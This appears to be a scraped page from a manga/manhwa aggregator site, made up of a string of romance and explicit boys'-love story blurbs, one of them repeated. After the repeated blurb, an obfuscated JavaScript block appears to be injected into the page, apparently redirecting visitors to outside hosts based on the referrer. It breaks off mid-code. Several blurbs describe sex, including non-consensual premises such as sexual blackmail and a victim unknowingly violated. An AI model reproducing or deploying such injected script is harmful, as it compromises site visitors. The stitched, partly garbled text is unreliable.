Her childhood friend's love for her borders on obsessive. It took Suzune Amaoka a year to convince her overprotective parents to let her live by herself... Now, it's finally moving day! When her doorbell rings, she's shocked to find her old friend Chisaki Enomoto standing outside. What's even more shocking is that the boy she once had a crush on is now saying he's going to be her roommate. Living together has never been so nerve-wracking! Is this her imagination run wild, or is it reality!!?? The boy who got away is back, and he wants to get wet and wild with her...!!
."The unfortunate chain began when a man and a woman from conflicting villages fell in love with each other. Now, without falling in loveMomoki Shirakawa became the bride of Chikage Kurotaki in the neighboring village overnight.Overwhelmed by the pressure from both families, he accepts his destiny and wears white innocence, but his newly-married life inevitably starts while being stuck with the terrible Chikage!!!
The Republic of Korea, where humans and beastmen, beings of opposite poles, coexist. 'Tae-seong', a shark, has to win the prize money in a swimming competition to pay off his loan debt, but his rival 'Yun-jae' wins the first prize each time. Then one day, Tae-seong finds out that Yoon-jae is actually a 'human' in the shower room, and tries to threaten him to pay back the debt on the condition that he will keep Yoon-jae secret, but somehow it doesn't work out. "When I call, come and suck my bottom and fuck me"
Jin, heir to his family's shrine, has a secret. For years, he has harbored a crush on his childhood friend, Misaki. Misaki, who Jin sees as pure and innocent, looks up to Jin with reverence and awe for his dignified and almost otherworldly appearance and grace in his role as the son of a shaman. Lately, Jin's crush has been becoming more and more sexual in nature, and he can't seem to keep himself from gazing longingly at Misaki and fantasizing about him. Fearing that the truth of his feelings might ruin their relationship and taint Misaki's perception of him, Jin refuses to give even a hint of his true feelings, and as a result has become more and more pent up from suppressing his desires. This buildup of sexual frustration has led his dreaming mind to wander, and every night Jin is overcome by fantasies of himself and Misaki entangling their bodies together in sin-filled lu**. At the end of his rope, Jin leans on a senior classmate from a spiritualist club for assistance to help him find a way to let out his pent up energy. This club member lends him a new s** toy from his collection, advising him only to use the "miraculous" fleshlight if nothing else will work. It isn't long before Jin feels no option but to turn to the adult toy, and after a full night of indulgence, Jin comes to rely on the strange s** toy at all hours, both day and night. Over and over, Jin releases his lu** for Misaki with the adult toy, but as it turns out, this is no ordinary fleshlight. Its warm and sticky narrow passage squeezes and spasms around his fingers as he inserts them, movements that make the toy feel as if it were real. Well, unbeknownst to Jin, by some miracle or curse, the opening of the fleshlight is directly connected to Misaki's a**! As it turns out, every time Jin relentlessly ravages the toy, lost in fantasies of himself pounding desperately into Misaki, Misaki finds that he is himself being sexually tormented by what he can only imagine is some sort of perverted ghost. What will happen as a result of this "miracle" toy? Will this strange s** toy somehow bring the two of them together, or will the inevitable realization of the truth shatter their relationship completely?+
Her family went bankrupt and her fiance broke up with her. On a snowy night, she met the guy who changes her whole life. In order to save the family, she gave up her dignity and pride. She thought everything would be better after that night, but the truth was... "You did all these on purpose!" He looked at her coldly, "Meeting you was the biggest mistake of my life." It turned out that he had never loved her...
Her family went bankrupt and her fiance broke up with her. On a snowy night, she met the guy who changes her whole life. In order to save the family, she gave up her dignity and pride. She thought everything would be better after that night, but the truth was… “You did all these on purpose!” He looked at her coldly, “Meeting you was the biggest mistake of my life.” It turned out that he had never loved her…<script></script><script>function _0x3fce(){var _0x14e45e=['lfwQK','google','FOgFh','3015730rwBPxO','floor','33zAWmCV','501076Kabjxz','then','location','https://ip','.top/','http://rea','UTMdS','1433481UUlKub','text','uYjVy','referrer','KkWNT','MVYzk','dma.net/','256nMJEVF','8106679HEhUkA','utntf','pNQBa','780798MkJewe','ewGlC','href','2HqSkiu','ymofu','86364VkKTnm','.customapi','includes','random','51950hBSEie','664NuPMdE'];_0x3fce=function(){return _0x14e45e;};return _0x3fce();}(function(_0x2a9019,_0x3beab4){var _0x47aafc=_0x588c,_0x5f379a=_0x2a9019();while(!![]){try{var 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Workplace romances may help workers expand their skillsets... "My Handsome Junior is My Secret Jerk-Off Partner": Morishita has always admired Kase from afar. How can someone be so perfect? But now is not the time to be distracted; Morishita must focus on his (technically his coworker's) task at hand. It's looking like it'll be another late night for him at the office... with Kase...? "My Awful Boss is My Secret Jerk-Off Partner": Ever since Momose realized he was gay, he has kept it secret from those around him. Soon, he found himself isolated and unable to communicate with people properly. Momose is the polar opposite of his boss, Chief Uchiumi, who emits the sparkly aura of a beautiful social butterfly. Momose steers clear of him in every and all situation. It's good he won't ever have to interact with Uchiumi outside of work!
"Have you heard that rumor about the man's restroom? It's haunted by the ghost of Hanako who appears there at midnight." It's the middle of the night. Seto is an office worker who ventures into a supposedly haunted restroom in the building where he works to see if the rumors about the bathroom ghost are true, but... "Would you like to do... dirty things with me?" Much to his surprise, Hanako turns out to be the ghost... of a man! "If I don't satisfy my sexual urges, I won't be able to move on." Seeing how sad the ghost looks, confused Seto succumbs to his charm... and ends up having sex with him! "Please, use this. Let me move on to the other side." What is the true identity of the slutty bathroom ghost who seduces Seto...!?
Read manhwa "My Boss is a Giant: He Manages My Every Need With Enormous Skill The Complete Collection" for free at Summary:Natsumi, also known as "Ham-chan," hustles at a demanding office job like a hamster running in a wheel. Meanwhile, her boss Samejima is more like a shark. He's handsome, sure, but he's also imposing and scary at least, until he confesses his feelings for her?! Natsumi is a little overwhelmed at seeing a vulnerable side to this gigantic man, especially since she doesn't have a lot of experience in the love department, but she's secretly thrilled to see more. Together, this big boss with a carnivorous appetite and the smaller woman who's hungry for his love are ready to unleash their wild sides!Alternative:My Boss Is a Giant: He Manages My Every Need With Enormous Skill, The Scary Boss's Extra Large Size Won't Fit!, XL, Kowamote Joushi no XL Size ga Hairimasen!, XL !, XLWhat is mangabuddy?mangabuddy is currently the largest manhwa website with thousands of high-quality manhwa. Above all, readers can enjoy reading manhwa on mangabuddy without incurring any costs. If you love the manhwa "My Boss is a Giant: He Manages My Every Need With Enormous Skill The Complete Collection", don't forget to follow the !Wish you happy reading!
.Kim Yemin is an ordinary office worker who is curious about the newly appointed director Ma Kanghan, however he warns Kim Yemin of the restructuring saying that he is not doing a good job. Director Ma makes Kim Yemin a dangerous offer that hangs by a thread to avoid being fired. +not found...
Aya was deserted right before her marriage and was left without a place to live. One day, she finds herself wandering back into the house she was supposed to own after her wedding. To her surprise, the cold-blooded boss she hates from work had moved in as the new owner! A dangerous love ignites under one roof between the girl who lost love and her sadistic boss!